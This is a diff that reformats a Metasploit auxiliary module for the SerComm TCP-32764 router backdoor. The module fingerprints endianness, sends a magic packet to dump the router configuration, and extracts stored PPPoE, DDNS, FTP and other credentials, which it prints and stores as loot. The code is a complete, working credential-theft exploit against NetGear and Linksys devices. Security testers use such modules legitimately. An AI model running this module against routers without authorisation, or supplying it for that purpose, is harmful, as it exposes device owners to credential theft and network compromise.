@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
@@ -15,8 +14,8 @@ class MetasploitModule < Msf::Auxiliary
       [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
       [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ],
       [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
-      [ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras
-      [ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra
+      [ 'CMS', { 'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras
+      [ 'BigPondAuth', { 'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra
       [ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ],
       [ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ],
     ],
@@ -30,56 +29,63 @@ class MetasploitModule < Msf::Auxiliary
     ]
   }
 
-  attr_accessor :endianness
-  attr_accessor :credentials
+  attr_accessor :endianness, :credentials
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "SerComm Device Configuration Dump",
-      'Description'    => %q{
-        This module will dump the configuration of several SerComm devices. These devices
-        typically include routers from NetGear and Linksys. This module was tested
-        successfully against the NetGear DG834 series ADSL modem router.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SerComm Device Configuration Dump',
+        'Description' => %q{
+          This module will dump the configuration of several SerComm devices. These devices
+          typically include routers from NetGear and Linksys. This module was tested
+          successfully against the NetGear DG834 series ADSL modem router.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
           'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'OSVDB', '101653' ],
           [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
         ],
-      'DisclosureDate' => '2013-12-31' ))
+        'DisclosureDate' => '2013-12-31',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(32764),
-        ])
+    register_options(
+      [
+        Opt::RPORT(32764),
+      ]
+    )
   end
 
   def run
-    print_status("Attempting to connect and check endianness...")
+    print_status('Attempting to connect and check endianness...')
     @endianness = fingerprint_endian
     @credentials = {}
 
     if endianness.nil?
-      print_error("Failed to check endianness, aborting...")
+      print_error('Failed to check endianness, aborting...')
       return
     end
     print_good("#{string_endianess} device found...")
 
-    print_status("Attempting to connect and dump configuration...")
+    print_status('Attempting to connect and dump configuration...')
     config = dump_configuration
 
     if config.nil?
-      print_status("Error retrieving configuration, aborting...")
+      print_status('Error retrieving configuration, aborting...')
       return
     end
 
-    loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations")
+    loot_file = store_loot('router.config', 'text/plain', rhost, config[:data], "#{rhost}router_config.txt", 'Router Configurations')
     print_good("Router configuration dump stored in: #{loot_file}")
 
     parse_configuration(config[:data])
@@ -123,15 +129,14 @@ class MetasploitModule < Msf::Auxiliary
 
   def string_endianess
     if little_endian?
-      return "Little Endian"
+      return 'Little Endian'
     elsif big_endian?
-      return "Big Endian"
+      return 'Big Endian'
     end
 
     return nil
   end
 
-
   def fingerprint_endian
     begin
       connect
@@ -147,9 +152,9 @@ class MetasploitModule < Msf::Auxiliary
       return nil
     end
 
-    if res.start_with?("MMcS")
+    if res.start_with?('MMcS')
       return 'BE'
-    elsif res.start_with?("ScMM")
+    elsif res.start_with?('ScMM')
       return 'LE'
     end
 
@@ -158,9 +163,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def dump_configuration
     if big_endian?
-      pkt = [0x4d4d6353, 0x01, 0x00].pack("NVV")
+      pkt = [0x4d4d6353, 0x01, 0x00].pack('NVV')
     elsif little_endian?
-      pkt = [0x4d4d6353, 0x01, 0x00].pack("VNN")
+      pkt = [0x4d4d6353, 0x01, 0x00].pack('VNN')
     else
       return nil
     end
@@ -172,32 +177,32 @@ class MetasploitModule < Msf::Auxiliary
     disconnect
 
     if res.blank?
-      vprint_error("No answer...")
+      vprint_error('No answer...')
       return
     end
 
     if big_endian?
-      mark, zero, length, data = res.unpack("NVVa*")
+      mark, zero, length, data = res.unpack('NVVa*')
     else
-      mark, zero, length, data = res.unpack("VNNa*")
+      mark, zero, length, data = res.unpack('VNNa*')
     end
 
     unless mark == 0x4d4d6353
-      vprint_error("Incorrect mark when reading response")
+      vprint_error('Incorrect mark when reading response')
       return nil
     end
 
     unless zero == 0
-      vprint_error("Incorrect zero when reading response")
+      vprint_error('Incorrect zero when reading response')
       return nil
     end
 
     unless length == data.length
-      vprint_warning("Inconsistent length / data packet")
+      vprint_warning('Inconsistent length / data packet')
       # return nil
     end
 
-    return { :length => length, :data => data }
+    return { length: length, data: data }
   end
 
   def parse_configuration(data)
@@ -217,8 +222,9 @@ class MetasploitModule < Msf::Auxiliary
       parse_auth_config(config)
     end
 
-    @credentials.each do |k,v|
-      next unless v[:user] and v[:password]
+    @credentials.each do |k, v|
+      next unless v[:user] && v[:password]
+
       print_good("#{k}: User: #{v[:user]} Pass: #{v[:password]}")
       report_cred(
         ip: rhost,
@@ -229,13 +235,12 @@ class MetasploitModule < Msf::Auxiliary
         proof: v.inspect
       )
     end
-
   end
 
   def parse_general_config(config)
     SETTINGS['General'].each do |regex|
       if config.match(regex[1])
-        value = $1
+        value = ::Regexp.last_match(1)
         print_status("#{regex[0]}: #{value}")
       end
     end
@@ -247,13 +252,12 @@ class MetasploitModule < Msf::Auxiliary
 
       # find the user/pass
       if config.match(cred[1]['user'])
-        @credentials[cred[0]][:user] = $1
+        @credentials[cred[0]][:user] = ::Regexp.last_match(1)
       end
 
       if config.match(cred[1]['pass'])
-        @credentials[cred[0]][:password] = $1
+        @credentials[cred[0]][:password] = ::Regexp.last_match(1)
       end
-
     end
   end
 end
